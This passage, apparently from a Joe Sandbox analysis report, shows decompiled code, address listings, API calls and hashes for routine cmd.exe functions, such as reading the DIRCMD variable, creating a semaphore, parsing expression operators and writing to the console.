					_t229 =  &(_t229[0]);
					_t228 =  &(_t228[1]);
					_t276 = _t276 - 1;
					_t167 = _t167 - 1;
					_t173 = _t173 + 1;
				}
				goto L93;
			}

0x00d88f70
0x00d88f75
0x00d88f77
0x00d88f7c
0x00d88f87
0x00d88f88
0x00d88f8e
0x00d88f93
0x00d88f98
0x00d88f9c
0x00d88fa4
0x00d88fa7
0x00d88faa
0x00d88fb1
0x00d88fb3
0x00d88fb6
0x00d88fb8
0x00d88fbb
0x00d88fc3
0x00d88fc8
0x00d88fcd
0x00da08a4
0x00da08a9
0x00d89369
0x00d89369
0x00d8936c
0x00d8936c
0x00d890d3
0x00d890d3
0x00d890da
0x00d890e4
0x00d890f2
0x00d890f2
0x00da08b2
0x00da08b8
0x00da08b8
0x00da08bd
0x00d89366
0x00d89366
0x00000000
0x00d89366
0x00da08c6
0x00da08cc
0x00da08cc
0x00da08cf
0x00da08d3
0x00d89096
0x00d89098
0x00d8909b
0x00d8909e
0x00d890a1
0x00d890a1
0x00d890aa
0x00d890b4
0x00d890b6
0x00d890bd
0x00d890fc
0x00000000
0x00d89102
0x00d89102
0x00d89105
0x00d8910b
0x00d891ef
0x00d891f2
0x00d89205
0x00d89207
0x00d8920a
0x00d8920f
0x00d8922a
0x00d8922a
0x00d8922c
0x00d8922c
0x00d89230
0x00d89230
0x00d89233
0x00d89236
0x00d89241
0x00d893b6
0x00d893b8
0x00d893b8
0x00d893c0
0x00d893c0
0x00d893c3
0x00d893c6
0x00d893cd
0x00d89249
0x00d8924b
0x00da08ed
0x00d8926d
0x00d8926d
0x00d89270
0x00d89277
0x00d89377
0x00d8937a
0x00d8937c
0x00d8937c
0x00d89380
0x00d89380
0x00d89383
0x00d89386
0x00d8935d
0x00d8935f
0x00d892c7
0x00d892c7
0x00d892ca
0x00d892cc
0x00d892cc
0x00d892d0
0x00d892d0
0x00d892d3
0x00d892d6
0x00d892e2
0x00d892e7
0x00d892f1
0x00da08f6
0x00da08f6
0x00d892f7
0x00d892fd
0x00d89300
0x00d89303
0x00d8930a
0x00da08ff
0x00da08ff
0x00da0902
0x00000000
0x00d89310
0x00d89315
0x00d891e2
0x00d891e2
0x00d891e4
0x00d891e7
0x00000000
0x00d891e7
0x00d8930a
0x00d8927d
0x00d89280
0x00d89293
0x00d89295
0x00d8929a
0x00d8938d
0x00d89390
0x00d89393
0x00d89393
0x00d89396
0x00d89399
0x00d893a2
0x00d893a4
0x00d893a9
0x00d893af
0x00d893af
0x00d893a9
0x00d892a0
0x00d892a3
0x00d892a6
0x00d892a8
0x00d892a8
0x00d892b0
0x00d892b0
0x00d892b3
0x00d892b6
0x00d892c1
0x00d8934d
0x00d8934f
0x00d8934f
0x00d89352
0x00d89352
0x00d89355
0x00d89358
0x00000000
0x00d89352
0x00000000
0x00d892c1
0x00d89251
0x00d89253
0x00d89253
0x00d89256
0x00d89256
0x00d89259
0x00d8925c
0x00d89267
0x00d893d4
0x00d893d6
0x00d893d6
0x00d893e0
0x00d893e0
0x00d893e3
0x00d893e6
0x00d893ed
0x00d893ed
0x00000000
0x00d89267
0x00d89247
0x00000000
0x00d89247
0x00d89211
0x00d89213
0x00d89213
0x00d89216
0x00d89216
0x00d89219
0x00d8921c
0x00d89225
0x00d89227
0x00000000
0x00d89227
0x00d89114
0x00da090a
0x00da090d
0x00da0910
0x00d8911a
0x00d8911a
0x00d8911a
0x00d89121
0x00d89123
0x00d89126
0x00d89128
0x00d89128
0x00d8912e
0x00000000
0x00000000
0x00d89135
0x00d89138
0x00d8913b
0x00d8913b
0x00d89143
0x00da091c
0x00da091c
0x00000000
0x00da091c
0x00d8914b
0x00d8914d
0x00d8914f
0x00da0924
0x00da0929
0x00000000
0x00000000
0x00da0933
0x00da0938
0x00da093e
0x00da0944
0x00da0944
0x00da0948
0x00da0960
0x00000000
0x00da0960
0x00d89155
0x00d89158
0x00d8915a
0x00d8915d
0x00d8915d
0x00d8915f
0x00d89162
0x00d89168
0x00000000
0x00000000
0x00d89170
0x00d89170
0x00d89179
0x00d8917c
0x00000000
0x00000000
0x00d89182
0x00d89185
0x00d8918c
0x00d89194
0x00d8919a
0x00000000
0x00000000
0x00d891a2
0x00d891a7
0x00d891ac
0x00d891af
0x00d891b2
0x00d891b2
0x00d891b7
0x00d891bd
0x00d891c2
0x00000000
0x00000000
0x00d89322
0x00d89325
0x00d89326
0x00d8932d
0x00000000
0x00000000
0x00d89334
0x00d89339
0x00d8933f
0x00d89342
0x00d89345
0x00d89345
0x00d891c8
0x00d891cb
0x00d891ce
0x00d891d1
0x00d891d4
0x00d891d7
0x00d891dd
0x00000000
0x00000000
0x00d891df
0x00000000
0x00d891df
0x00d890fc
0x00d890bf
0x00d890c9
0x00d890cb
0x00d890cd
0x00d890d0
0x00000000
0x00d890d0
0x00d88fd3
0x00d88fd5
0x00d88fd8
0x00d88fda
0x00d88fe0
0x00d88fe0
0x00d88fe6
0x00000000
0x00000000
0x00d88fe8
0x00d88fef
0x00000000
0x00d88ffa
0x00d88ffa
0x00d88ffa
0x00d88ffd
0x00d89000
0x00000000
0x00d89000
0x00d88fef
0x00d8900e
0x00000000
0x00000000
0x00d89014
0x00d89019
0x00000000
0x00000000
0x00d89023
0x00d8902c
0x00d8902e
0x00d89033
0x00000000
0x00000000
0x00d89039
0x00d89039
0x00d8903e
0x00000000
0x00000000
0x00d89046
0x00da08dd
0x00000000
0x00000000
0x00da08e3
0x00da08e5
0x00000000
0x00da08e5
0x00d89051
0x00000000
0x00000000
0x00d89057
0x00d89059
0x00d8905b
0x00d8905d
0x00d8905d
0x00d89060
0x00d89063
0x00d89066
0x00d89069
0x00d8906e
0x00000000
0x00000000
0x00d89076
0x00d8908e
0x00d89090
0x00000000
0x00000000
0x00000000
0x00d89090
0x00d89078
0x00d8907e
0x00000000
0x00000000
0x00d89080
0x00d89083
0x00d89086
0x00d89089
0x00d8908a
0x00d8908b
0x00d8908b
0x00000000

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

_wcsnicmp.MSVCRT ref: 00D891B7
wcstol.MSVCRT ref: 00D891FC
wcstol.MSVCRT ref: 00D8928A
longjmp.MSVCRT(?,000000FF,35C4FBB8,-00000002,?,00000000), ref: 00DA08B2
longjmp.MSVCRT(?,000000FF), ref: 00DA08C6

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
String ID:
API String ID: 2863075230-0
Opcode ID: 70a6be5b3a0c4fe9de34a786e9b02b7f21a116b1cf8db5d0352992ea3f247fce
Instruction ID: 34171c1a9c164cff5f2bb697aa63d7b0efc983555b5eeaa8b57375740db943d6
Opcode Fuzzy Hash: 70a6be5b3a0c4fe9de34a786e9b02b7f21a116b1cf8db5d0352992ea3f247fce
Instruction Fuzzy Hash: 46F1B075D042169BCF24EF98C8A46BEF7B1EF88700F1D4219D896A7384E7759D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D94F66, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D94F66(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				WCHAR* _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				char _v1076;
				void _v1084;
				void* _v1096;
				int _v1100;
				WCHAR* _v1104;
				WCHAR* _v1108;
				char _v1112;
				WCHAR* _v1116;
				int _v1120;
				void* _v1124;
				intOrPtr _v1128;
				void* _v1138;
				int _v1142;
				int _v1146;
				int _v1150;
				int _v1154;
				int _v1158;
				int _v1162;
				int _v1166;
				int _v1170;
				short _v1172;
				int _v1176;
				WCHAR* _v1180;
				int _v1184;
				char _v1188;
				int _v1192;
				int _v1196;
				intOrPtr _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				WCHAR* _t97;
				signed int _t101;
				char _t112;
				void* _t113;
				void* _t135;
				void* _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;

				_t130 = __edx;
				_t143 = (_t141 & 0xfffffff8) - 0x4ac;
				_t78 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t78 ^ _t143;
				_v1200 = __ecx;
				_v1180 = 0;
				_v1172 = 0;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = 0;
				_t112 = 1;
				_v1184 = 0;
				_v1176 = 0;
				_v1170 = 0;
				_v1166 = 0;
				_v1162 = 0;
				_v1158 = 0;
				_v1154 = 0;
				_v1150 = 0;
				_v1146 = 0;
				_v1142 = 0;
				asm("stosd");
				_v564 = 0;
				asm("stosd");
				_v560 = 1;
				_v556 = 0x104;
				asm("stosd");
				asm("stosw");
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1104 = 0;
				_v1100 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				memset( &_v1084, 0, 0x104);
				_t144 = _t143 + 0xc;
				if(E00D90C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L14:
					__imp__??_V@YAXPAX@Z(_v564);
					_pop(_t135);
					_pop(_t139);
					_pop(_t113);
					return E00D96FD0(_t112, _t113, _v8 ^ _t144, _t130, _t135, _t139);
				}
				_t140 =  *0xdc3cd8;
				_v1192 = 6;
				_v20 = 0x104;
				_v1188 = 0;
				_v1196 = 0x8000;
				_v1124 = 0;
				_v1104 = 0;
				_v28 = 0;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_t144 = _t144 + 0xc;
				if(E00D90C70( &_v548, GetEnvironmentVariableW(L"DIRCMD", 0, 0)) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					goto L14;
				}
				_t97 = _v28;
				if(_t97 == 0) {
					_t97 =  &_v548;
				}
				if(GetEnvironmentVariableW(L"DIRCMD", _t97, _v20) != 0) {
					_t122 = _v28;
					if(_v28 == 0) {
						_t122 =  &_v548;
					}
					if(E00D8CB48( &_v1196) == _t112) {
						_push(0);
						_push(0x2377);
						E00D8C5A2(_t122);
					}
				}
				_t130 =  &_v1196;
				if(E00D8CB48( &_v1196) != _t112) {
					_t101 = _v1196;
					if((_t101 & 0x00000040) != 0) {
						_t101 = _t101 & 0xfffb79fb;
						_v1196 = _t101;
					}
					if((_t101 & 0x00000400) != 0) {
						_v1196 = _t101 & 0xfffffdbb;
					}
					_t124 = _v564;
					if(_v564 == 0) {
						_t124 =  &_v1084;
					}
					_t130 = _v556;
					E00D936CB(_t112, _t124, _v556, 0);
					if(_v1128 == 0) {
						_t125 = _v564;
						_v1124 = _t112;
						if(_v564 == 0) {
							_t125 =  &_v1084;
						}
						_v1120 = E00D9297B(_t125);
						_v1112 = _t112;
						_v1116 = 0;
						_v1108 = 0;
					}
					_t112 = E00D92DD2( &_v1188, _t130);
					_t106 = _v556;
					if(_v556 == 0) {
						_t106 =  &_v1076;
					}
					E00D90BFC(_t106, _v548);
					E00D92A06(_t140, 0);
				}
				goto L13;
			}

0x00d94f66
0x00d94f6e
0x00d94f74
0x00d94f7b
0x00d94f85
0x00d94f8b
0x00d94f8f
0x00d94f98
0x00d94fa0
0x00d94fa9
0x00d94fad
0x00d94fae
0x00d94fb2
0x00d94fb6
0x00d94fba
0x00d94fbe
0x00d94fc2
0x00d94fc6
0x00d94fca
0x00d94fce
0x00d94fd2
0x00d94fd6
0x00d94fd9
0x00d94fe0
0x00d94fe1
0x00d94fe8
0x00d94fef
0x00d94ff0
0x00d94ff4
0x00d94ffc
0x00d95000
0x00d95004
0x00d95008
0x00d9500c
0x00d95010
0x00d95014
0x00d95015
0x00d95016
0x00d9501f
0x00d9502d
0x00d9504a
0x00d95176
0x00d9517d
0x00d9518d
0x00d9518e
0x00d9518f
0x00d9519a
0x00d9519a
0x00d95050
0x00d9505d
0x00d95066
0x00d95076
0x00d9507a
0x00d95082
0x00d95086
0x00d9508a
0x00d95091
0x00d95098
0x00d9509d
0x00d950bc
0x00d95168
0x00d9516f
0x00000000
0x00d95175
0x00d950c2
0x00d950cb
0x00d950cd
0x00d950cd
0x00d950e9
0x00d9f084
0x00d9f08d
0x00d9f08f
0x00d9f08f
0x00d9f0a1
0x00d9f0a7
0x00d9f0a8
0x00d9f0ad
0x00d9f0b3
0x00d9f0a1
0x00d950f3
0x00d950fe
0x00d95100
0x00d95106
0x00d95108
0x00d9510d
0x00d9510d
0x00d95116
0x00d9f0be
0x00d9f0be
0x00d9511c
0x00d95125
0x00d9519b
0x00d9519b
0x00d95127
0x00d9512f
0x00d95138
0x00d9f0c7
0x00d9f0ce
0x00d9f0d4
0x00d9f0d6
0x00d9f0d6
0x00d9f0e2
0x00d9f0e6
0x00d9f0ea
0x00d9f0ee
0x00d9f0ee
0x00d95147
0x00d95149
0x00d95152
0x00d951a4
0x00d951a4
0x00d9515c
0x00d95163
0x00d95163
0x00000000

APIs

memset.MSVCRT ref: 00D9501F

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

memset.MSVCRT ref: 00D95098
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 00D950A7
GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 00D950E1
??_V@YAXPAX@Z.MSVCRT ref: 00D9516F
??_V@YAXPAX@Z.MSVCRT ref: 00D9517D

Strings

DIRCMD, xrefs: 00D950A2, 00D950DC

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$EnvironmentVariable
String ID: DIRCMD
API String ID: 1405722092-1465291664
Opcode ID: 93094d48435c6d203028129ffe64e77a805cf44db25733ec20bbe884d73cbe1c
Instruction ID: f7e392afbbe9843fc8d41cee5bc2b1ebd87a33f0f338a74dfa88240ad92d1f45
Opcode Fuzzy Hash: 93094d48435c6d203028129ffe64e77a805cf44db25733ec20bbe884d73cbe1c
Instruction Fuzzy Hash: EA7136B150C7829FDB64DF29D885A9BBBE4FF95304F14492EF199C3260DB309908CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00DA196F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00DA196F(void** __ecx, intOrPtr _a4, signed int _a12, signed int _a16) {
				void* _v0;
				signed int _v8;
				char _v532;
				void** _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short* _t26;
				void* _t29;
				void* _t31;
				signed int* _t38;
				void** _t40;
				long _t41;
				signed int _t42;
				signed int _t47;
				char* _t48;
				void* _t55;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				void* _t64;
				signed int _t65;

				_t20 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t20 ^ _t65;
				_t59 = _a12;
				_t40 = __ecx;
				_v536 = __ecx;
				_t24 = _t59 & 0x80000000 | _a16;
				if((_t59 & 0x80000000 | _a16) != 0) {
					E00D980F2(_t24);
				}
				E00D91040( &_v532, 0x104, _a4);
				_t57 = 0x104;
				_t26 =  &_v532;
				while( *_t26 != 0) {
					_t26 = _t26 + 2;
					_t57 = _t57 - 1;
					if(_t57 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t47 =  ~_t57 & 0x00000104 - _t57;
				if(_t57 != 0) {
					_t38 =  &_v532 + _t47 * 2;
					_t64 = 0x104 - _t47;
					if(_t64 == 0) {
						L14:
						_t38 = _t38 - 2;
					} else {
						_t55 = 0x7ffffffe;
						_t57 = L"_p0" - _t38;
						while(_t55 != 0) {
							_t42 =  *(_t38 + _t57) & 0x0000ffff;
							if(_t42 == 0) {
								break;
							} else {
								 *_t38 = _t42;
								_t55 = _t55 - 1;
								_t38 =  &(_t38[0]);
								_t64 = _t64 - 1;
								if(_t64 != 0) {
									continue;
								} else {
									L13:
									_t40 = _v536;
									goto L14;
								}
							}
							goto L16;
						}
						if(_t64 != 0) {
							_t40 = _v536;
						} else {
							goto L13;
						}
					}
					L16:
					 *_t38 = 0;
				}
				_t60 = _t59 & 0x7fffffff;
				_t29 = _t60;
				if(_t60 <= 0) {
					_t29 = 1;
				}
				_t48 =  &_v532;
				__imp__CreateSemaphoreExW(0, _t60, _t29, _t48, 0, 0x1f0003);
				_t61 = _t29;
				if(_t61 == 0) {
					_t57 = 0x1621;
					_t63 = E00DA2913("internal\\sdk\\inc\\wil\\ResultMacros.h");
					if(_t63 >= 0) {
						goto L25;
					} else {
						_t57 = 0x84;
						E00DA292C("wil", _t63);
						_t31 = _t63;
					}
				} else {
					_t63 =  *_t40;
					if(_t63 != 0) {
						_t41 = GetLastError();
						if(CloseHandle(_t63) == 0) {
							_push(_t48);
							_t57 = 0x879;
							E00DA2D56();
						}
						SetLastError(_t41);
						_t40 = _v536;
					}
					 *_t40 = _t61;
					L25:
					_t31 = 0;
				}
				return E00D96FD0(_t31, _t40, _v8 ^ _t65, _t57, _t61, _t63);
			}

0x00da197a
0x00da1981
0x00da1987
0x00da198a
0x00da198e
0x00da1999
0x00da199c
0x00da199e
0x00da199e
0x00da19b3
0x00da19b8
0x00da19ba
0x00da19c0
0x00da19c6
0x00da19c9
0x00da19cc
0x00000000
0x00000000
0x00000000
0x00da19cc
0x00da19d6
0x00da19d8
0x00da19dc
0x00da19e4
0x00da19e7
0x00da19e9
0x00da1a1c
0x00da1a1c
0x00da19eb
0x00da19f0
0x00da19f5
0x00da19f7
0x00da19fb
0x00da1a02
0x00000000
0x00da1a04
0x00da1a04
0x00da1a07
0x00da1a08
0x00da1a0b
0x00da1a0e
0x00000000
0x00da1a10
0x00da1a16
0x00da1a16
0x00000000
0x00da1a16
0x00da1a0e
0x00000000
0x00da1a02
0x00da1a14
0x00da1a21
0x00000000
0x00000000
0x00000000
0x00da1a14
0x00da1a27
0x00da1a29
0x00da1a29
0x00da1a2c
0x00da1a32
0x00da1a34
0x00da1a36
0x00da1a36
0x00da1a42
0x00da1a4d
0x00da1a53
0x00da1a57
0x00da1aa7
0x00da1ab6
0x00da1aba
0x00000000
0x00da1abc
0x00da1abf
0x00da1aca
0x00da1acf
0x00da1acf
0x00da1a59
0x00da1a59
0x00da1a5d
0x00da1a66
0x00da1a70
0x00da1a72
0x00da1a76
0x00da1a7b
0x00da1a7b
0x00da1a81
0x00da1a87
0x00da1a87
0x00da1a8d
0x00da1a8f
0x00da1a8f
0x00da1a8f
0x00da1aa1

APIs

CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 00DA1A4D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DA1A5F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 00DA1A68
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00DA1A81

Strings

_p0, xrefs: 00DA19EB
internal\sdk\inc\wil\ResultMacros.h, xrefs: 00DA1AAC
wil, xrefs: 00DA1AC5

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleSemaphore
String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
API String ID: 2276426104-46676964
Opcode ID: 61f0fbc4d7d0d9d0debe2f850e67d94e8032a3be387c9a5d201f0a54e53c8fee
Instruction ID: 0e3c8f31cf0515b90711d1bb00b5b993ca6516996005806423df4e149e80f17b
Opcode Fuzzy Hash: 61f0fbc4d7d0d9d0debe2f850e67d94e8032a3be387c9a5d201f0a54e53c8fee
Instruction Fuzzy Hash: A0412739B4122A9BCB249F28CD55BAA73A5EF86710F184158F809D7380DB70DD01CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D86785, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D86785(signed short** __ecx, signed short** __edx, void* __eflags, signed short** _a4) {
				signed short* _t8;
				signed short _t9;
				long _t13;
				signed short** _t18;
				signed short _t25;
				long _t32;
				wchar_t* _t33;
				signed short** _t34;

				_t18 = __edx;
				_t34 = __ecx;
				E00D89794(__ecx);
				_t32 =  *( *_t34) & 0x0000ffff;
				if(_t32 == 0 || iswdigit(_t32) != 0 || wcschr(L"<>+-*/%()|^&=,", _t32) != 0) {
					L12:
					return 0;
				} else {
					_t33 = L"+-~!";
					if(wcschr(_t33, _t32) != 0) {
						goto L12;
					}
					_t8 =  *_t34;
					 *_t18 = _t8;
					while(1) {
						_t9 =  *_t8 & 0x0000ffff;
						_t25 = _t9;
						if(_t9 == 0) {
							break;
						}
						_t13 = _t25 & 0x0000ffff;
						if(_t13 <= 0x20 || wcschr(_t33, _t13) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t34) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t34 =  &(( *_t34)[1]);
							_t8 =  *_t34;
							continue;
						}
					}
					 *_a4 =  *_t34;
					return 1;
				}
			}

0x00d8678d
0x00d8678f
0x00d86791
0x00d86798
0x00d8679e
0x00d86828
0x00000000
0x00d867c2
0x00d867c3
0x00d867d3
0x00000000
0x00000000
0x00d867d5
0x00d867d7
0x00d867d9
0x00d867d9
0x00d867dc
0x00d867e1
0x00000000
0x00000000
0x00d867e3
0x00d867e9
0x00000000
0x00d86810
0x00d86810
0x00d86813
0x00000000
0x00d86813
0x00d867e9
0x00d8681c
0x00000000
0x00d86820

APIs

iswdigit.MSVCRT ref: 00D867A5
wcschr.MSVCRT ref: 00D867B6
wcschr.MSVCRT ref: 00D867C9
wcschr.MSVCRT ref: 00D867ED
wcschr.MSVCRT ref: 00D86804

Strings

+-~!, xrefs: 00D867C3, 00D867C8, 00D867EC
<>+-*/%()|^&=,, xrefs: 00D867B1, 00D867FF

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$iswdigit
String ID: +-~!$<>+-*/%()|^&=,
API String ID: 2770779731-632268628
Opcode ID: db4ffd2dc4a4c8b3eb4f8331a6e3d11645a6f472f92d4618952650e3a940723c
Instruction ID: 59aebeb53be55c35abd4686754d1bae7bd37a3004c5abae617c24b174474a21b
Opcode Fuzzy Hash: db4ffd2dc4a4c8b3eb4f8331a6e3d11645a6f472f92d4618952650e3a940723c
Instruction Fuzzy Hash: 42116D762042439F9B24AF6AA858876B7FCEF9A771324042EF585C76D0EB21DC049770

Uniqueness

Uniqueness Score: -1.00%

Function 00D8B610, Relevance: 12.2, APIs: 8, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00D8B610(void* __ebx, void** __ecx, void* __edi) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				void* _t37;
				intOrPtr _t39;
				void* _t40;
				void* _t52;
				long _t55;
				long _t56;
				void* _t57;
				long _t61;
				void* _t66;
				long _t73;
				void* _t85;
				void* _t87;
				void** _t101;
				long _t104;

				_t101 = __ecx;
				_t37 = E00D9269C(E00D8B6B9(__ecx));
				_t104 = _t101[4];
				if(_t37 != 0) {
					_t39 = _t104 + _t101[2] * 2;
					_v12 = _t39;
					__eflags = _t104 - _t39;
					if(_t104 < _t39) {
						_t85 = 0x2022;
						while(1) {
							_t73 = _t104;
							__eflags = _t104 - _t39;
							if(_t104 >= _t39) {
								goto L3;
							} else {
								goto L12;
							}
							while(1) {
								L12:
								__eflags =  *_t73 - _t85;
								if( *_t73 == _t85) {
									break;
								}
								_t73 = 2 + _t73;
								__eflags = _t73 - _t39;
								if(_t73 < _t39) {
									continue;
								}
								break;
							}
							__eflags = _t73 - _t104;
							if(_t73 == _t104) {
								goto L20;
							} else {
								_t66 = _t73 - _t104 >> 1;
								_v16 = _t66;
								__imp___get_osfhandle(0);
								_t54 = WriteConsoleW(_t66, 1, _t104, _t66,  &_v8);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L30;
								} else {
									_t54 = _v16;
									__eflags = _v8 - _v16;
									if(_v8 != _v16) {
										goto L30;
									} else {
										_t39 = _v12;
										_t104 = _t73;
										_t85 = 0x2022;
										while(1) {
											L20:
											__eflags = _t73 - _t39;
											if(_t73 >= _t39) {
												break;
											}
											__eflags =  *_t73 - _t85;
											if( *_t73 == _t85) {
												_t73 = 2 + _t73;
												__eflags = _t73;
												continue;
											}
											break;
										}
										__eflags = _t73 - _t104;
										if(_t73 == _t104) {
											L27:
											_t85 = 0x2022;
											__eflags = _t104 - _t39;
											if(_t104 < _t39) {
												continue;
											} else {
												goto L3;
											}
										} else {
											__eflags =  *_t101;
											if( *_t101 != 0) {
												SetConsoleMode( *_t101, 2);
											}
											_t52 = _t73 - _t104 >> 1;
											_v16 = _t52;
											__imp___get_osfhandle(_t104, _t52,  &_v8, 0);
											_t87 = 1;
											_t104 = WriteConsoleW(_t52, ??, ??, ??, ??);
											_t54 = E00D906C0(_t87);
											__eflags = _t104;
											if(_t104 == 0) {
												goto L30;
											} else {
												_t54 = _v16;
												__eflags = _v8 - _v16;
												if(_v8 != _v16) {
													goto L30;
												} else {
													_t39 = _v12;
													_t104 = _t73;
													goto L27;
												}
											}
										}
									}
								}
							}
							goto L38;
						}
					}
					goto L3;
				} else {
					if(E00D927C8(_t101[2] + _t101[2], _t104, _t101[2] + _t101[2],  &_v8) == 0) {
						L30:
						_t89 = 1;
						_t55 = E00D90178(_t54);
						__eflags = _t55;
						if(_t55 == 0) {
							_t89 = 1;
							_t56 = E00DA9953(_t55, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								_push(_t56);
								_push(0x70);
								goto L34;
							}
						} else {
							_push(0);
							_push(0x1d);
							L34:
							E00D8C5A2(_t89);
							_pop(_t89);
						}
						_t57 = E00DA9287(_t89);
						__imp__longjmp(0xdbb8b8, 1);
						asm("int3");
						__eflags =  *(_t104 + 4) - _t57;
						if(__eflags < 0) {
							return _t57;
						} else {
							E00DA3BB0(__eflags, 0);
							 *(_t104 + 4) =  *(_t104 + 4) & 0x00000000;
							E00D94F29(_t104);
							_t61 =  *((intOrPtr*)(_t104 + 0x1c)) - 1;
							__eflags = _t61;
							 *(_t104 + 0x24) = _t61;
							return _t61;
						}
					} else {
						_t70 = _t101[2];
						_t54 = _t101[2] + _t70;
						if(_v8 != _t101[2] + _t70) {
							goto L30;
						} else {
							L3:
							_t40 = E00D9269C(_t39);
							if(_t40 != 0) {
								__imp___get_osfhandle(0);
								WriteConsoleW( &_v8, 1, L"\r\n", 2,  &_v8);
							} else {
								E00D927C8( &_v8, L"\r\n", 4,  &_v8);
							}
							_t101[1] = _t101[1] + E00D8BED7(_t101, _t101[4]) + 1;
							E00D8B6B9(_t101);
							if(_t101[1] > _t101[7]) {
								_t101[1] = _t101[1] & 0x00000000;
							}
							 *(_t101[4]) = 0;
							_t101[2] = _t101[2] & 0;
							return 0;
						}
					}
				}
				L38:
			}

0x00d8b61b
0x00d8b625
0x00d8b62a
0x00d8b62f
0x00d9983d
0x00d99840
0x00d99843
0x00d99845
0x00d9984b
0x00d99850
0x00d99850
0x00d99852
0x00d99854
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9985a
0x00d9985a
0x00d9985a
0x00d9985d
0x00000000
0x00000000
0x00d9985f
0x00d99862
0x00d99864
0x00000000
0x00000000
0x00000000
0x00d99864
0x00d99866
0x00d99868
0x00000000
0x00d9986a
0x00d99874
0x00d9987a
0x00d9987d
0x00d99885
0x00d9988b
0x00d9988d
0x00000000
0x00d99893
0x00d99893
0x00d99896
0x00d99899
0x00000000
0x00d9989f
0x00d9989f
0x00d998a2
0x00d998a4
0x00d998b3
0x00d998b3
0x00d998b3
0x00d998b5
0x00000000
0x00000000
0x00d998ab
0x00d998ae
